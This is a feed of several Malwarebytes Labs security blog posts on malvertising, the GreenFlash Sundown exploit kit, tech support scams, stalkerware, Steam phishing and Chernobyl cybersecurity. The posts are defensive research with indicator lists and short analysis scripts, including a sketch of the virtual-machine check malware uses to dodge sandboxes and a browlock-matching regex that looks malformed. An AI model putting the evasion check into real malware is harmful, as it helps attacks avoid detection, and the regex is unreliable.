Techie Feeds

Fake jquery campaign leads to malvertising and ad fraud schemes

Malwarebytes - Thu, 06/27/2019 - 16:14

Recently we became aware of new domains used by an old malware campaign known as ‘fake jquery’, previously documented by web security firm Sucuri. Thousands of compromised websites are injected with a reference to an external JavaScript called jquery.js.

However, there is something quite elusive about this campaign with regard to its payload. Indeed, for many researchers, the supposedly malicious JavaScript always comes back blank.

In this blog we share how we were able to identify the purpose of the fake jquery malware infection by looking for artifacts and employing a variety of User-Agent strings and geolocations.
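As a rough illustration of that approach, below is a minimal sketch of replaying the same injected script URL with a desktop and a mobile User-Agent and comparing the responses. The URL and User-Agent strings are placeholders, not the actual campaign infrastructure, and a real replay would also need to originate from different geolocations.

# Minimal sketch: fetch the same injected script URL with different
# User-Agent strings to see whether the server cloaks its payload.
import urllib.request

USER_AGENTS = {
    "desktop": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
    "android": "Mozilla/5.0 (Linux; Android 9; SM-G960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36",
}

url = "https://compromised-site.example/jquery.js"  # placeholder URL

for label, user_agent in USER_AGENTS.items():
    request = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        body = urllib.request.urlopen(request, timeout=10).read()
    except OSError as err:
        print(f"{label}: request failed ({err})")
        continue
    print(f"{label}: {len(body)} bytes returned")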

Unsurprisingly, we found a web of malicious redirects via malvertising campaigns with a strong focus on mobile users who are tricked into installing rogue apps. The end goal is to monetize via fullscreen adverts that pop up on your phone at regular intervals.

Looking for a clue

Our search begins by looking up some of the domains mentioned on Twitter by @Placebo52510486. There are thousands of sites listed by PublicWWW that have been injected with malicious jquery lookalikes.

While we do not know the exact infection vector, many of these websites are running an outdated Content Management System (CMS).

Like other researchers before us, when we replayed the traffic, the supposedly malicious JavaScript was once again empty.

However, with some persistence and luck, we were able to find an archive of this script when it was not empty.

We can see that it contains a redirect to: financeleader[.]co. A cursory check on this domain shows host pairs corresponding to those fake jquery domains. It’s worth noting that browsing to the root domain without the special identifier will redirect to google.com.

Desktop web traffic

There is some geo-targeting involved in the redirections, and desktop users clearly do not appear to be the primary focus here. From a US IP address, you are presented with a bogus site where all items point to the same link, which redirects you to instantcheckmate[.]com.

Associated web traffic:

From a non-US IP address, you are redirected to a page that aggressively advertises VPNs:

Associated web traffic:

Mobile web traffic

Once we switch to a mobile User-Agent, Android in particular, we can see a lot more activity and a variety of redirects. For example, in one case we were served a bogus adult site that requires users to download an app in order to play the videos:

Associated web traffic:

This app is malicious (detected as Android/Trojan.HiddenAds.xt by Malwarebytes) and will generate full screen ads at regular intervals.

Traffic monetization and ad fraud

While we encountered some desktop traffic, we believe the primary goal of the fake jquery campaign is to monetize mobile traffic. This would explain the level of filtering involved to weed out non-qualified traffic.

We weren’t able to get an idea of the scale at play, especially considering that the domain initiating the redirects really only became active in late May. However, given the number of websites that have been compromised, this campaign is quite likely funneling a significant amount of traffic leading to ad fraud.

Malwarebytes users are protected against this campaign both on desktop and mobile.

Indicators of Compromise

Fake jquery domains:
12js[.]org
16js[.]org
22js[.]org
lib0[.]org
16lib[.]org
12lib[.]org
wp11[.]org

Redirects:
financeleader[.]co
afflink[.]org

Malicious APKs:
0e67fd9fc535e0f9cf955444d81b0e84882aa73a317d7c8b79af48d91b79ef19
a210c9960edc5362b23e0a73b92b4ce4597911b00e91e7d3ca82632485c5e68d
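For reference, here is a minimal sketch of checking a local file against the hashes listed above; the file path is a placeholder.

# Minimal sketch: compare a local APK's SHA-256 hash against the IoCs above.
import hashlib

IOC_HASHES = {
    "0e67fd9fc535e0f9cf955444d81b0e84882aa73a317d7c8b79af48d91b79ef19",
    "a210c9960edc5362b23e0a73b92b4ce4597911b00e91e7d3ca82632485c5e68d",
}

def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

sample = "suspicious.apk"  # placeholder path
print("known malicious APK" if sha256_of(sample) in IOC_HASHES else "no match against the list above")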

The post Fake jquery campaign leads to malvertising and ad fraud schemes appeared first on Malwarebytes Labs.

Categories: Techie Feeds

GreenFlash Sundown exploit kit expands via large malvertising campaign

Malwarebytes - Wed, 06/26/2019 - 18:30

Exploit kit activity has been relatively quiet for some time, with the occasional malvertising campaign reminding us that drive-by downloads are still a threat.

However, during the past few days we noticed a spike in our telemetry for what appeared to be a new exploit kit. Upon closer inspection we realized it was actually the very elusive GreenFlash Sundown EK.

The threat actors behind it have a unique modus operandi that consists of compromising ad servers that are run by website owners. In essence, they are able to poison the ads served by the affected publisher via this unique kind of malvertising.

In this blog, we review their latest campaign, which is responsible for pushing ransomware, Pony, and a coin miner. A number of publishers have been compromised, and this marks the first time we have seen GreenFlash Sundown EK expand widely outside of Asia.

Stealthy compromise

At first, we believed the attack originated from an ad network, but by reviewing traffic captures we were able to pinpoint where it actually came from. One of the affected publishers is onlinevideoconverter[.]com, a popular site for converting videos from YouTube and other platforms into files. According to SimilarWeb, it draws 200 million visitors per month:

Stats over the past few months show high traffic volume

People navigating to the page to convert YouTube videos into the MP4 format will be sent to the exploit kit, but only after some very careful fingerprinting. The full redirection sequence is shown below:

Web traffic leading to the exploit kit

The redirection mechanism is cleverly hidden within a fake GIF image that actually contains a well obfuscated piece of JavaScript:

Smart way to conceal JavaScript within an image
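As a rough way to hunt for this kind of trick, the sketch below flags files that begin with a GIF header but also contain script-like strings. The filename and marker list are assumptions for illustration only; a well obfuscated sample may not contain any of them.

# Minimal sketch: flag a "GIF" that also carries script-like content.
import re

GIF_MAGIC = (b"GIF87a", b"GIF89a")
JS_MARKERS = re.compile(rb"eval\(|String\.fromCharCode|document\.write|<script", re.IGNORECASE)

def looks_like_fake_gif(path):
    with open(path, "rb") as handle:
        data = handle.read()
    return data.startswith(GIF_MAGIC) and bool(JS_MARKERS.search(data))

print(looks_like_fake_gif("suspicious.gif"))  # placeholder filename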

After some painful debugging, we can see that it links to fastimage[.]site:

Debugging the JavaScript reveals the next hop in the chain

The next few sessions contain more interesting code, including a file loaded from fastimage[.]site/uptime.js, which is actually a Flash object.

Another fancy method of performing a covert redirect

This performs the redirection to adsfast[.]site, which we recognize as being part of the GreenFlash Sundown exploit kit. It uses a Flash exploit to deliver its encoded payload via PowerShell:

Leveraging PowerShell is interesting because it allows the attackers to run some pre-checks before deciding whether or not to drop the payload. For example, in this case it will check that the environment is not a virtual machine. If the environment is acceptable, it will deliver a very visible payload in the form of SEON ransomware:

SEON’s ransomware note
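Going back to those pre-checks: as a rough illustration of what such an environment check does (this is not the actual PowerShell used by GreenFlash Sundown), a sketch might simply look for virtualization vendors in the system information.

# Minimal sketch of a VM pre-check, for illustration only; not the exploit kit's code.
import subprocess

VM_MARKERS = ("vmware", "virtualbox", "qemu", "kvm", "xen", "hypervisor", "virtual machine")

def probably_a_vm():
    try:
        info = subprocess.run(
            ["systeminfo"], capture_output=True, text=True, timeout=60
        ).stdout.lower()
    except (OSError, subprocess.TimeoutExpired):
        return False
    return any(marker in info for marker in VM_MARKERS)

print("VM markers found" if probably_a_vm() else "no obvious VM markers")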

The ransomware uses a batch script to perform some of its duties, such as deleting shadow copies:

Batch helper to delete backups

GreenFlash Sundown EK will also drop Pony and a coin miner while victims struggle to decide the best course of action in order to recover their files.

Wider campaign

Our previous encounters with GreenFlash Sundown EK, for example during our winter 2019 exploit kits review, were always limited to South Korea. However, based on our telemetry this campaign is active in North America and Europe, which is an interesting departure for this threat group.

Telemetry stats showing where we found GreenFlash Sundown most active

Malwarebytes users were already protected against these drive-by attacks and we have informed the publisher about the compromise so that they can take action.

Indicators of Compromise

GreenFlash Sundown infrastructure:
hxxps[://]fastimage[.]site/
hxxp[://]adsfast[.]site/
hxxp[://]accomplishedsettings[.]cdn-cloud[.]club/
104.248.42[.]143
172.105.66[.]231
198.211.126[.]118

Seon ransomware:
a89591555b9acb65353c2b854e582bc41db2fbc0eda2210b89a877d1862084df
591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b

Pony:
c772bdf4bd05ab63d90f4399e97a1d7eec2891c221739e3b843f9a8c9eddf4d3
9ff00b46b949bd76923137c0b0ed3cd4e252d6e88a55e9b4798525fa40164850

Coin miner:
58002d0b8acd1a539503d8ea02ff398e7ad079e0b856087f0ca30d767588be4e

[Update: 2019-06-28] Joseph Chen from Trend Micro has blogged about the return of this campaign, known as ShadowGate.

The post GreenFlash Sundown exploit kit expands via large malvertising campaign appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Recipe for success: tech support scammers zero in via paid search

Malwarebytes - Tue, 06/25/2019 - 15:00

Tech support scammers are known for engaging in a game of whack-a-mole with defenders. Case in point, last month there were reports that crooks had invaded Microsoft Azure Cloud Services to host fake warning pages, also known as browser lockers. In this blog, we take a look at one of the top campaigns that is responsible for driving traffic to those Azure-hosted scareware pages.

We discovered that the scammers have been buying ads displayed on major Internet portals to target an older demographic. Indeed, they were using paid search results to drive traffic towards decoy blogs that would redirect victims to a browlock page.

This scheme has actually been going on for months and has intensified recently, all the while keeping the same modus operandi. Although not overly sophisticated, the threat actors behind it have been able to abuse major ad platforms and hosting providers for several months.

Leveraging paid search results

Tech support scams are typically distributed via malvertising campaigns. Cheap adult traffic is usually first on the list for many groups of scammers. Not only is it cost effective, but it also plays into the psychology of users believing they got infected after visiting a dodgy website.

Other times, we see scammers actively targeting brands by trying to impersonate them. The idea is to reel in victims looking for support with a particular product or service. However, in this particular campaign, the crooks are targeting folks looking up food recipes.

There are two types of results from a search engine results page (SERP):

  • Organic search results that match the user’s search query based on relevance. The top listed sites are usually those that have the best Search Engine Optimization (SEO).
  • Paid search results, which are basically ads relevant to the user’s query. They require a certain budget where not all keywords are equal in cost.

Because paid search results are typically displayed at the top (often blending in with organic search results), they tend to generate more clicks.

We searched for various recipes on several different web portals (CenturyLink, Att.net, Yahoo! search and xfinity) and were able to easily find the ads bought by the scammers.

We do not have exact metrics on how many people clicked on those ads, but we can infer that this campaign drew a significant amount of traffic based on two indicators: the first is our own telemetry, and the second is data from a URL shortener used by one of the websites:

While those ads look typical and match our keyword search quite well, they redirect to websites created with malicious intent.

Decoy websites

To support their scheme, the scammers have created a number of food-related blogs. The content appears to be genuine, and there are even some comments on many of the articles.

However, upon closer inspection, we can see that those sites have basically taken content from various web developer sites offering paid or free HTML templates. “<!-- Mirrored from…” is an artifact left by the HTTrack website copier tool. Incidentally, this kind of mirroring is something we often witness when it comes to browser locker pages that have been copied from other sites.
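A minimal sketch of hunting for that artifact in saved copies of suspect pages is shown below; the directory path is a placeholder.

# Minimal sketch: scan saved HTML pages for the HTTrack "Mirrored from" artifact.
from pathlib import Path

for page in Path("saved_pages").rglob("*.html"):  # placeholder directory
    text = page.read_text(errors="ignore")
    if "Mirrored from" in text:
        print(f"{page}: possible HTTrack copy")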

During our testing, visiting those sites directly did not create any malicious redirection, and they seemed to be absolutely benign. With only circumstantial evidence and without the so-called smoking gun, a case could not be made just yet.

Full infection chain

After some trial and error that included swapping various User-Agent strings and avoiding using commercial VPNs, we eventually were able to replay a full infection chain, from the original advert to the browser locker page.

The blog’s URL is actually called three consecutive times, and the last one performs a POST request with the eventual conditional redirect to the browlock. In the screenshot below, you can see the difference between proper cloaking (no malicious behavior) and the redirect to a browlock page:

Browlock page

The fake warning page is fairly standard. It checks for the type of browser and operating system in order to display the appropriate template to Windows and Mac OS victims.

The scammers often register entire ranges of hostnames on Azure by iterating through numbers attached to random strings. While many of those pages are taken down quickly, new ones are constantly popping back up in order to keep the campaign running. Here are some URI patterns we observed:

10-server[.]azurewebsites[.]net/call-now1/
2securityxew-561error[.]azurewebsites[.]net/Call-Now1/
10serverloadingfailed-hgdfc777error[.]azurewebsites[.]net/chx/
11iohhwefuown[.]azurewebsites[.]net/Call-Support1/
11serversecurityjunkfile-65error[.]azurewebsites[.]net/Call-Mac-Support/
2serverdatacrash-de-12error[.]azurewebsites[.]net/macx/
2systemservertemporaryblockghjj-510error[.]azurewebsites[.]net/mac-support/
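As a rough illustration, here is a simplified heuristic of our own for spotting hostnames and paths that fit the patterns above. It is an assumption-laden sketch, not the regex published in the IoC section below, and its keyword list will not catch every variation.

# Minimal sketch: a simplified heuristic for browlock-style Azure hostnames.
import re

HOST_PATTERN = re.compile(r"^\d+[a-z0-9-]*\.azurewebsites\.net$", re.IGNORECASE)
PATH_KEYWORDS = ("call-now", "call-support", "mac-support", "chx", "macx")

def looks_like_browlock(host, path):
    return bool(HOST_PATTERN.match(host)) and any(
        keyword in path.lower() for keyword in PATH_KEYWORDS
    )

print(looks_like_browlock("10-server.azurewebsites.net", "/call-now1/"))  # first pattern above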

We believe the crooks may also be rotating the decoy site that performs the redirect in addition to the existing user filtering in order to evade detection from security scanners.

Finding the perpetrators

We do not condone interacting with scammers directly, but part of this investigation was about finding who was behind this campaign in order to take action and spare more victims.

Continuing with the deception, the rogue technicians lied to us about the state of our computer and made up imaginary threats. The goal was to sell expensive support packages that actually add little value.

The company selling those services is A2Z Cleaner Pro (AKA Coretel Communications) and was previously identified by one victim in August 2018 in a blog comment on the FTC’s website.

Their website is hosted at 198.57.219.8, where we found two other interesting artifacts. The first one is a company named CoreTel that is also used by the scammers as a kind of business entity. It appears to be a rip-off of another domain that pre-existed it by several years and is also hosted on the same IP address:

Then there are two new recipe sites, both registered in June, which, like the previous ones, use content copied from other places:

Mitigation and take down

Malwarebytes’ browser extension was already blocking the various browlock pages heuristically.

We immediately reported the fraudulent ads to Google and Microsoft (Bing), as well as the decoy blogs to GoDaddy. The majority of their domains have been taken down already and their ad campaigns banned.

This tech support scam campaign cleverly targeted an older segment of the population by using paid search results for food recipes via online portals used by many Internet Service Providers.

There is no doubt scammers will continue to abuse ad platforms and hosting providers to carry out their business. However, industry cooperation for takedowns can set them back and save thousands of victims from being defrauded.

Indicators of compromise

Decoy blogs

alhotcake[.]com
bestrecipesus[.]com
cheforrecipes[.]com
chilly-recipesfood[.]com
cookwellrecipes[.]com
dezirerecipes[.]com
dinnerplusrecipes[.]com
dinnerrecipiesforu[.]com
handmaderecipies[.]com
homecookedrecipe[.]com
hotandsweetrecipe[.]com
just-freshrecipes[.]com
lunch-recipesstore[.]com
mexirecipes[.]com
neelamrecipes[.]com
nidhikitchenrecipes[.]com
organicrecipesandfood[.]com
recipes4store[.]com
recipestores[.]com
royalwarerecipes[.]com
smokyrecipe[.]com
specialsweetrecipes[.]com
starcooking[.]club

starrecipies[.]com
sweethomemadefoods[.]com
tatesty-recipes[.]com
today4recipes[.]com
tophighrecipes[.]com
toptipsknowledge[.]com
totalspicyrecipes[.]com
vegfood-recipes[.]com
yammy-recipes[.]com

healthycookingidea[.]com
recipesstudios[.]com

a2zpcprotection[.]com
a2zcleanerpro[.]com

Regex to match browlock URIs on Azure

^http(s|):\/\/(?!www)^.{2}[a-z]{2,7}\/([cC]all-([nN]ow|Support)1|chx|macx|(Call-)?[mM]ac-[sS]upport)

The post Recipe for success: tech support scammers zero in via paid search appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (June 17 – 23)

Malwarebytes - Mon, 06/24/2019 - 16:29

Last week on the Malwarebytes Labs blog, we took a look at the growing pains of smart cities, took a deep dive into AI, jammed along to Radiohead, and looked at the lessons learned from Chernobyl in relation to critical infrastructure. We also explored a new Steam phish attack, and pulled apart a Mac cryptominer.

Other cybersecurity news
  • Florida City falls to ransomware: Riviera Beach City Council agrees to pay $600,000 to regain use of hijacked computers. (Source: Forbes)
  • Smart TV virus warning goes AWOL: A peculiar promotional message warning about the dangers posed to smart TVs goes missing. But why? (Source: The Register)
  • Used Nest cams allow continued cam access: This has been fixed, but read on for a look at what happens in the realm of IoT when old devices connect in ways you’d rather they didn’t. (Source: Wirecutter)
  • Fake profiles on LinkedIn go spying: An interesting tale of scammers making use of AI-generated profile pictures to make their bogus accounts look a little more believable. (Source: Naked Security)
  • Bella Thorne takes fight to extortionists: The actress decided to share stolen photographs of herself to teach a hacker a lesson. (Source: Hollywood Reporter)
  • This phish is a fan of encryption: A new scam claims an encrypted message is waiting, but you need to log in to view it. (Source: Bleeping Computer)
  • Mobile app concerns: High risk vulnerabilities abound in both iOS and Android apps. (Source: Help Net Security)
  • Twitter takes on state sponsored accounts: The social media platform took down around 5,000 accounts being used to push propaganda. (Source: Infosecurity Magazine)
  • Malware comes gunning for Google 2FA: A new attack tries its best to bypass additional security restrictions. (Source: We Live Security)
  • A security hole in one: Mobile malware attempts to swipe numerous pieces of personal information. (Source: SC Magazine)

Stay safe, everyone!

The post A week in security (June 17 – 23) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile stalkerware: a long history of detection

Malwarebytes - Mon, 06/24/2019 - 15:00

Recently, we have received an alarming question from many Malwarebytes users, asking, “Do you detect stalkerware?” The answer is an overwhelming, “Absolutely, and for good reason!” Moreover, we have been doing so for a long time, and are expanding our efforts in the months to come.

Going back more than five years, Malwarebytes researchers have detected applications and software that monitor other people’s online behavior and physical whereabouts. Our firm belief then is what we hold to be true now: People who are being watched have a right to know. And, taking that a step further, people should be able to consciously choose which applications and software are on their machines.

It’s your device, your choice. But when it comes to stalkerware, we know it’s not as simple as that—especially for victims of domestic abuse. So that’s why we launched a concerted effort to build a more comprehensive list of stalkerware and block it via Malwarebytes for Android, as well as Malwarebytes for Mac and Windows. (Malwarebytes for iOS no longer has scanning capabilities because of Apple constraints.)

Over the last month, we analyzed more than 2,500 samples of programs that had been flagged in research algorithms as potential monitoring/tracking apps, spyware, or stalkerware. Our database of known stalkerware has now increased to include 100 applications that no one else detects, including seven that are, as of press time, still on Google Play.

In addition, we’ve partnered with local shelters, nonprofit groups, and law enforcement, as well as other security professionals, to share intel and build awareness. Our aim is to protect domestic abuse victims on and off their devices. Stay tuned for more blogs with advice on what to do if you find stalkerware on your phone, and how parents and other individuals can determine if a monitoring app is safe to use.

What is stalkerware?

The term stalkerware can be applied to any application that can be used to stalk/spy on someone else. Stalkerware is often marketed as a legitimate mobile tracking program to keep tabs on loved ones, especially children. Some of these programs are used above board by families keeping a close eye on their kids’ devices or users looking to find lost phones/laptops. However, these programs are often misused, to the detriment of victims who can now be tracked wherever they go, even if they are trying to get away from abusive partners or other dangerous individuals.

What can stalkerware do?

To get to what stalkerware can do, let’s first look at the longtime mobile threat category monitor, which is a subset of potentially unwanted programs (PUPs). Because some of these stalkerware applications can be used legitimately, they are currently flagged as programs users potentially might not want on their phones. However, once presented with what stalkerware can do (or once they learn a program has been installed on their device without consent), many users will likely want to delete these apps.

To see how scary a monitoring app can be, for example, I invite you to read Mobile Menace Monday: beware of monitoring apps. To highlight, here is a list of information a monitoring app/stalkerware can gather—all of which can be sent to a remote user.

  • GPS location
  • Pictures taken with front/rear camera (unbeknownst to user)
  • SMS messages
  • Call history
  • Browser history
  • Recorded audio via device mic
  • Email accounts stored on device
  • Phone numbers in contact list
  • IP address of device
A monitoring app can pinpoint a device’s exact location.

Even scarier, some of these apps are easily available on Google Play. More on that later.

A step further

Outside of Google Play, there lives a malevolent class of malware known as spyware. It has all the features of monitoring apps along with even more information-gathering capabilities, giving stalkers real-time data on their victims’ every move. In addition, spyware can be installed and remain undetected, stealthily hiding its presence deep within mobile or desktop devices.

However, stalkerware can achieve much the same results as spyware, and it’s more readily available on the market. These applications represent real-life threats to domestic abuse victims, who can readily be tracked down (along with their children), even when hidden in shelters.

In expanding our efforts to block stalkerware, we are working side-by-side with shelters, non-profit organizations, other AV vendors, and law enforcement agencies to collect as many samples of stalkerware as we can, and train victims on what to do if they suspect they are being tracked. This is a matter of personal security for victims, and we take their safety seriously.

Hard stance on monitoring apps

There is a small set of monitoring apps actively available on Google Play. These apps advertise themselves as helping hands for finding lost or stolen mobile devices, or for keeping track of younger children in the family.

Admittedly, there is an argument that these apps can indeed be helpful in both of those cases. Nevertheless, the potential to have the same appalling outcome as spyware exists. For this reason, we aggressively detect monitoring apps, even if they are in Google Play.

If users have knowingly and willingly downloaded monitoring apps to their own devices, they needn’t delete them when we detect them. Directions on how to keep a program that you know and trust that we’ve flagged are here for Windows users. For Android users:

  1. Run a scan.
  2. On the results screen, below each checkbox is a drop-down arrow. Click on the arrow.
  3. From the list of options, select “Ignore Always.” Future scans will no longer detect the app as suspicious.
Call to action

Historically, apps that fall under the stalkerware umbrella have been extremely difficult to track down. That’s why we are calling on our patrons to help! Please reach out if you or someone you know suspects an app can be used to stalk its victims—and especially let us know if Malwarebytes for Android does not currently detect that app. You can do so via our Malwarebytes Support Forum or by submitting a ticket with Malwarebytes support.

In addition, look out for our next article on stalkerware that aims to provide victims with guidance on how to tell if their device has stalkerware installed, and what to do if that’s the case.

Dedicated to protecting you

It is a haunting reality that technology can be used for abusive purposes, especially those with horrifying physical outcomes. With most malware, some far-off threat actor is making a profit off of strangers by selling their data, zapping their CPU, or scamming them into handing over a few hundred dollars. It’s dirty business, but no one is physically harmed.

With stalkerware, there is a real-life threat with dire consequences.

There is no more important task for a cybersecurity company than to protect its users from harm—and stalkerware opens the door to the worst form of it. This is a pursuit that all of us at Malwarebytes take on with the utmost gravitas. We hope you will join us in the fight.

Stay safe out there!

The post Mobile stalkerware: a long history of detection appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fresh “video games” site welcomes new users with Steam phish

Malwarebytes - Fri, 06/21/2019 - 16:51

Over the weekend, I received this unsolicited message from an acquaintance on Steam:

1 free game for new users!
Take the game you want https://t.co/{redacted}

Fortunately, other friends on Steam were quick to publicly warn others about potentially hacked accounts spamming dubious messages to anyone (if not everyone) in their network. I was reading these warnings hours before receiving a sample of the spam message to my own account.

A shallow online search reveals that this campaign has been going on since mid-March of this year. Because it’s quite low-profile, not many have been able to dig deeper into it. We’ll attempt to do that here.

Latest Steam phishing campaign: a walk-through

Steam users were right to point out that this shortened URL indeed redirects to a phishing domain—though not directly.

Clicking the t.co link (a Twitter-shortened URL) in the chat takes users to the site behind it: steamredirect[dot]fun. This is the redirector domain that takes users to the “proper” phishing page, which pretends to be a site where one can win free games.
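For readers who want to see where such a shortened link leads without opening it in a browser, here is a minimal sketch that walks the redirect chain hop by hop. The t.co URL is a placeholder, not the actual link from the spam message.

# Minimal sketch: follow a shortened URL's redirect chain manually.
import urllib.error
import urllib.request

class NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # do not follow redirects automatically

opener = urllib.request.build_opener(NoRedirect)
url = "https://t.co/XXXXXXXX"  # placeholder shortened link
hops = 0
while url and hops < 10:
    try:
        response = opener.open(url, timeout=10)
    except urllib.error.HTTPError as err:
        response = err  # a 3xx response surfaces here, carrying its headers
    status = getattr(response, "code", None) or getattr(response, "status", None)
    print(status, url)
    url = response.headers.get("Location")
    hops += 1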

Screenshot of the site called Gift4Keys, just one of the many identical websites out there that the shortened URL points users to.

In the middle of the site is the “Try your luck” section, a roulette game where users can get their (supposed) free game. All they have to do is press the blue Play button.

Whoo! I won PUBG!

The page then tells the user that they have less than 30 minutes to claim the complete key by logging into their Steam account via the website. At the same time, the page also shows that the user would need to wait 24 hours before they can spin the roulette again and get another free game.

Clicking the Login via Steam button here—or at the upper right-hand corner of the site—opens a page that looks like the bog-standard Steam login page used by unaffiliated third-party sites, either as a pop-up window or in a new tab. The site did both during several tests.

The fake Steam login

Here are a few reasons why, at this point, Steam users should consider bailing out of this site altogether and not hand over their credentials:

  • The links on the page, such as “Profile Privacy Setting” and “create an account” don’t work.
  • The URL address bar is blank. On legitimate unaffiliated third-party sites, the login window displays an EV certificate for Valve Corp, and the URL in the address bar shows that the sign-in takes place on steamcommunity.com.
  • The Language drop-down box at the upper right-hand corner doesn’t work. It also appears to be in Russian even when visitors are outside of Russia.

Supplying credentials to this phish page, as we know, will result in accounts getting hijacked to further proliferate the phishing links.

Links in identical campaigns in the past were not hidden behind a URL shortener. It’s also no surprise that these links kept changing. In this case, the shortened URLs have, at some point, redirected to the following domains, all of which are less than four months old:

  • easyk3y[dot]com
  • ezzkeys[dot]com
  • g4meroll[dot]com
  • g4me5[dot]com
  • gift4keys[dot]com
  • gifts-key[dot]com
  • ong4me[dot]com
  • tf2details[dot]com
  • yes-key[dot]com

Be forewarned that a number of these sites are still online, and if you visit them, they all look like this:

As of this writing, the only way to access the actual “free games roulette” page we have been showing above is by appending certain strings at the end of the URLs. That’s probably a good thing.

Keep calm and be vigilant

Steam has long been a platform of choice for fraudsters because of its millions of active users. This isn’t the first time that users have encountered and reacted to such a phishing campaign. In fact, this latest one has all the telltale signs of previous campaigns: a Steam friend sends a message with a link out of nowhere, the link leads to a fake Steam login page, and the collected Steam credentials are used to hijack accounts and spam their friends.

Yes, there are still Steam users falling for old tricks. Yet, it’s also good to see Steam users realizing the danger early on, giving their friends a heads-up about it, and, should they suspect that they are affected, trying to contain their zombified accounts to prevent other users from getting compromised.

So be calm, keep on the lookout, stay informed, and continue to look after each other.

Stay safe!

The post Fresh “video games” site welcomes new users with Steam phish appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Chernobyl’s lessons for critical-infrastructure cybersecurity

Malwarebytes - Fri, 06/21/2019 - 15:30

This story originally ran on The Parallax on April 26, 2019.

CHERNOBYL EXCLUSION ZONE, Ukraine—The stray dog looking directly at me was hard to resist. Her ears perked up, her fur appeared clean—free of mange, at any rate—and she held a large stick firmly between her jaws.

She looked like a good dog. She wanted to be petted or, at least, have someone wrestle the stick from her—perhaps throw it so she could retrieve it. But because we met near Cafe Desyatka, in the woods of the Chernobyl Exclusion Zone, a 1,004-square-mile region slightly smaller than Yosemite National Park that surrounds the Chernobyl Nuclear Power Plant, looking but not touching was probably the safer choice. I was less worried about how irradiated she might be than about whether she had rabies.

According to a 2017 estimate by the United States–based nonprofit Clean Futures Fund, this dog was one of hundreds of strays living in the Exclusion Zone, near the power plant, and in the abandoned cities of Chernobyl and Pripyat, which once housed the nuclear facility’s employees. The organization offers aid to communities decimated by industrial accidents, and that includes caring for the Chernobyl dogs, many of whom die young due to malnourishment, disease, predators, harsh weather, a lack of shelter, and Chernobyl’s notorious environmental contamination.

Soviet soldiers forced the owners of the dogs’ ancestors to abandon them in the evacuation that followed the Chernobyl disaster, which began 33 years ago today. Chernobyl, the first nuclear-power plant in the Soviet Union, had been operational for nine years. At 1:23 a.m. on April 26, 1986, a series of facility tests initiated the prior day culminated in the fuel chamber getting overpressurized.

During the tests, which were designed to determine how long the turbines would spin after a loss of electricity, an operator decided to carry on with testing procedures amid signs that the reactor was malfunctioning. Two explosions, driven by super-heated steam, followed. And smoke from fires spread radioactive material—400 times the amount released at Hiroshima—far beyond Chernobyl.

Two Chernobyl workers were immediately killed by explosions. Three more died the following week, and by the end of July, radiation exposure had killed 28 people, including six firefighters, according to the World Nuclear Association’s assessment of the Chernobyl disaster, last updated in April 2018. At least 106 others received doses of radiation high enough to contract acute radiation sickness.

This was not the first disaster at Chernobyl: A partial meltdown of Chernobyl Reactor 1’s core occurred in 1982, but the event and its impact were concealed from the public.

The official Soviet response was to blame the disaster on facility workers who bungled the tests. This conclusion was supported by the International Atomic Energy Agency in 1992. But Chernobyl’s deputy chief engineer, Anatoly Stepanovich Dyatlov, alleged in a 1992 interview that flaws in the reactor design were the root cause.

One of the hundreds of stray dogs living in the Chernobyl Exclusion Zone, descendants of the original pets which Soviet soldiers forced Chernobyl residents to abandon in the aftermath of the disaster. Photo by Seth Rosenblatt/The Parallax

Dyatlov’s judgment is supported by a 2002 report for the National Academy of Sciences of Belarus, which investigated the reactor design and how it led to the disaster. It is also supported by a 2009 analysis by the World Nuclear Association:

“The accident at Chernobyl was the product of a lack of safety culture. The reactor design was poor, from the point of view of safety, and unforgiving for the operators, both of which provoked a dangerous operating state. The operators were not informed of this and were not aware that the test performed could have brought the reactor into an explosive condition. In addition, they did not comply with operational procedures. The combination of these factors provoked a nuclear accident of maximum severity in which the reactor was totally destroyed within a few seconds.”

Multiple human factors led to the disaster at Chernobyl, from the Soviet decision to use the flawed reactor system when building the facility in the 1970s to the operators’ actions that fateful hour in 1986. And experts believe that human errors, including a reliance on overly connected or outdated systems to monitor and run critical infrastructure, could be exploited to pose similar threats to today’s nuclear-power facilities.

It remains an open question whether the industry’s collective responses are enough to stave off even the most clever of nation-state cyberattacks. What’s clear is that cyberattacks against all critical-infrastructure operations are on the rise, and nuclear-power facilities are not exempt, according to a 2016 report by the nuclear-security nonprofit Nuclear Threat Initiative.

Heavy regulations in the nuclear-power industry extending to cybersecurity protocol make nuclear-power facilities more secure than other types of power facilities, cybersecurity experts say. The regulations, in part, stem from education about Chernobyl. But cyberattacks against US nuclear-power facilities in the 2000s helped push regulators to take a more active role.

Early lessons from the school of cyber-knocks

In 2003, the computer worm SQL Slammer tackled more than 75,000 computers around the globe in 10 minutes, including those at the Davis-Besse nuclear-power plant in Ohio. Slammer prevented employees from accessing the software needed to monitor system safety for about five hours.

Thanks to a computer backup system, combined with the reactor being offline for unrelated reasons, the Slammer attack didn’t result in any damage. Instead, says Michael Toecker, the founder of cybersecurity consultancy Context Industrial Security, “the industry took it as a wake-up call…Everybody in nuclear turned their heads and said, ‘What just happened?’”

There were at least two other cybersecurity incidents at US nuclear-power plants that decade—in 2006, at the Browns Ferry Nuclear Power Plant in Alabama, and in 2008, at the Hatch Nuclear Power Plant in Georgia—before the US Nuclear Regulatory Commission mandated that all nuclear-power facilities have a cybersecurity plan in 2009.

